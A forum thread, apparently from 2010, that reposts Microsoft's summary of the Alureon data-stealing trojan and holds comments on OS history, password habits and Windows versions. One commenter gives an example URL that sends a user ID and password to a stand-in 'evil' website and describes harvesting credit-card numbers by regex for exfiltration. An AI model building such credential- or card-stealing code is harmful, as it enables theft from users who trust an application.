Skip to comments.
COMPUTER " TROJAN:Win32/Alureon.A"; or, The ROOTKIT MALWARE You Don't Even Know You Have.
http://www.microsoft.com/security ^
| Updated: Dec 16, 2009
| Microsoft
Posted on 04/07/2010 1:22:51 AM PDT by Yosemitest
Summary
Trojan:Win32/Alureon.A is a data-stealing trojan. This trojan allows an attacker to intercept incoming and outgoing Internet traffic in order to gather confidential information such as user names, passwords, and credit card data. Trojan:Win32/Alureon.A may also allow an attacker to transmit malicious data to the infected computer. The trojan may modify DNS settings on the host computer to enable the attacker to perform these tasks. Therefore it may be necessary to reconfigure DNS settings after Trojan:Win32/Alureon.A is removed from the computer.
Microsoft MalWare Protection Center has more info.
(Excerpt) Read more at microsoft.com ...
TOPICS: Extended News; Front Page News; News/Current Events
KEYWORDS: alureona; computer; malware; microsofttax; trojan; virus
Navigation: use the links below to view more comments.
first previous 1-20 ... 61-80, 81-100, 101-120, 121-135 next last
To: antiRepublicrat
The post I was replying to indicated the mac OS was developed in the 90s.
101
posted on
04/07/2010 12:40:15 PM PDT
by
driftdiver
(I could eat it raw, but why do that when I have a fire.)
To: LibreOuMort
102
posted on
04/07/2010 1:09:27 PM PDT
by
sionnsar
(IranAzadi|5yst3m 0wn3d-it's N0t Y0ur5:SONY|Remember Neda Agha-Soltan|TV--it's NOT news you can trust)
To: driftdiver
The post I was replying to indicated the mac OS was developed in the 90s. FreeBSD was developed in the 90s, based on the 386BSD port of BSD, which was started in the late 80s, released in the early 90s. OS X itself, as a whole, was developed in the 90s, but as you know based on those previous technologies.
To: NVDave; wireplay
That said, while the IO architecture of WinNT shows VMS parentage, the security aspects of VMS were almost all left behind. VMS had real security. Windows has very little of any of VMS security architecture, and the results show this. This could be due to the fact that mid-way through production Bill Gates did a "stop the presses" and had Cutler dump the APIs meant for NT and make a 32-bit version of the Windows 3.1 APIs to run on NT instead.
To: NVDave
Easiest way to say it: Modern x86 is a RISC chip with a CISC front-end.
To: Yosemitest
Somebody out there will come up with a little program to remove that soon for free I am sure.
106
posted on
04/07/2010 1:25:09 PM PDT
by
A CA Guy
( God Bless America, God bless and keep safe our fighting men and women.)
To: EdReform
107
posted on
04/07/2010 1:34:10 PM PDT
by
EdReform
(Oath Keepers - Guardians of the Republic - Honor your oath - Join us: www.oathkeepers.org)
To: antiRepublicrat
so as i said the genesis was in the 60s. thank you
108
posted on
04/07/2010 1:37:11 PM PDT
by
driftdiver
(I could eat it raw, but why do that when I have a fire.)
To: Yosemitest
To: Yosemitest
Thank you! When I got this new Win 7 computer and reinstalled CC, I neglected to note what I'd had on the old clunker.
Much appreciated...
110
posted on
04/07/2010 1:46:46 PM PDT
by
ErnBatavia
(It's not the Obama Administration....it's the "Obama Regime".)
To: Yosemitest
UNCHECK the top box "Only delete files in Windows Temp older than 24 hours"
Arrrgh...did that, ran it, and all my logins are gone!
111
posted on
04/07/2010 1:53:20 PM PDT
by
ErnBatavia
(It's not the Obama Administration....it's the "Obama Regime".)
To: wireplay
The mac folks think this is not possible and their O/S protects them from it when it has nothing whatsoever to do with the O/S. A user clicks Ok and their system is mine.Why do I get this terrible feeling that you know what you're talking about - and that you're right on this issue?
112
posted on
04/07/2010 3:15:30 PM PDT
by
GOPJ
(http://hisz.rsoe.hu/alertmap/index2.php?area=dam&lang=eng)
To: A CA Guy
Would it be too dubious to wonder if...
Microsoft was intentionally trying to destroy XP and Vista,
in order to sell Windows 7?
113
posted on
04/07/2010 3:34:57 PM PDT
by
Yosemitest
(It's simple, fight or die.)
To: ErnBatavia
That's why you NEVER save your log-ins and passwords,
but ALWAYS do them from the memory between your ears.
114
posted on
04/07/2010 3:37:48 PM PDT
by
Yosemitest
(It's simple, fight or die.)
To: Yosemitest
I’m with you - I never save a password... between the ears seems to work just fine...
115
posted on
04/07/2010 3:58:16 PM PDT
by
GOPJ
(http://hisz.rsoe.hu/alertmap/index2.php?area=dam&lang=eng)
To: GOPJ
I have never done malicious stuff on a machine. I am insured for $5M so that I WON’T do stuff like that.
Whenever a piece of software is run on a system, we have events that happen. An event is stuff like mouse move, mouse hover, form close, form closing, form initialized, etc. About 100 events on a Windows form. Same is true of Linux or Macs because computing is computing. The old days didn’t work like that but let’s ignore it for now.
Any event can be wired to do anything. Hence, I could wire an event to pass your credentials to a website.
Take a simple example:
http://www.myevilwebsite.com?runProgram=getUserId;uid=****;pw=****
Whenever you open up a form and start typing, I can wire up the Ok and Cancel button events, call the above website, and pass in whatever I wanted to to the cgi parms at the end. Calling a website would happen without you ever seeing a web browser and without you ever knowing. You could use a network sniffer like Fiddler but you wouldn’t check that. End users understand the web as a browser when it isn’t.
I can also hide everything from you through encryption so that you couldn’t even discern it if you wanted to.
Basically, computers operate 100% on trust and numbers. If you trust my app, the system can belong to me. People can scream all day long about Windows, Linux, and Macs but you click ok and game on.
People worry about viruses but it is the click to installthat is an issue. I could have you hover over an app, detect the hover, automatically scan your machine for all numbers on it that meet a credit card regex, then send them to a website. That is a very simple exploit and would take me around 1 hour to code. And the worst part is that there is absolutely nothing you can do to stop it ONCE the malware is introduced.
To: Yosemitest
Windows XP to Vista was a shift from the CPU to the GPU for graphics That was a major change. Vista was an interim base when Win 7 was the intended point. Vista cost Jim Allchin his job. Win 7 was what should have been post-XP.
To: GOPJ
When you type a password on a computer, it is known by the program you are typing on. Just because you don’t see it due to the asterisks, the program getting the password does know what is in it. There are exceptions but work with that assumption.
Hence, if I pop you a dialogue that says username/password, I can capture all you type.
To: Yosemitest; AFPhys; Las Vegas Dave; Quix
119
posted on
04/07/2010 5:12:38 PM PDT
by
DollyCali
(Don't tell God how big your storm is...Tell the storm how big your God is!)
To: Yosemitest
Don't think MS is planting bugs, because all the new little notebooks like the (Lenovo S10) seem to run on XP rather than newer software for quicker output.
Can't see MS sabotaging that IMO.
120
posted on
04/07/2010 5:23:13 PM PDT
by
A CA Guy
( God Bless America, God bless and keep safe our fighting men and women.)
Navigation: use the links below to view more comments.
first previous 1-20 ... 61-80, 81-100, 101-120, 121-135 next last
Disclaimer:
Opinions posted on Free Republic are those of the individual
posters and do not necessarily represent the opinion of Free Republic or its
management. All materials posted herein are protected by copyright law and the
exemption for fair use of copyrighted works.
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson